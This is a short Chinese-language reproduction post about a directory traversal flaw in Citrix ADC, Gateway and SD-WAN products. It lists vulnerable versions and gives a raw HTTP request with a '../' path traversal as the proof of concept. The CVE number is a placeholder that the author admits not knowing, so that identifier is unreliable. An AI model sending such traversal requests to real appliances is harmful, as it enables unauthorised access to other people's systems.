（CVE-2020-ianianian）Citrix_目录遍历漏洞-棉花糖会员站

# （CVE-2020-ianianian）Citrix 目录遍历漏洞

一、漏洞简介
————

我也不知道cve编号是多少，有知道的师傅可以告诉我一下。

二、漏洞影响
————

Citrix ADC and Citrix Gateway: \< 13.0-58.30 Citrix ADC and NetScaler Gateway: \< 12.1-57.18 Citrix ADC and NetScaler Gateway: \< 12.0-63.21 Citrix ADC and NetScaler Gateway: \< 11.1-64.14  NetScaler ADC and NetScaler Gateway: \< 10.5-70.18 Citrix SD-WAN WANOP: \< 11.1.1a Citrix SD-WAN WANOP: \< 11.0.3d Citrix SD-WAN WANOP: \< 10.2.7 Citrix Gateway Plug-in for Linux: \<  1.0.0.137 三、复现过程 ------------ GET /msn/randomname/../ HTTP/1.1 Host: www.0-sec.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: startupapp=neo; is_cisco_platform=0; stst=stst; uatz=uatz; drep=Jemoeder; st_splitter=350px; rdx_pagination_size=25%20Per%20Page; SESSID=9ed492e6ff1876d44ddcaec143d2f949 Upgrade-Insecure-Requests: 1 2.png

文章版权归作者所有，未经允许请勿转载。

THE END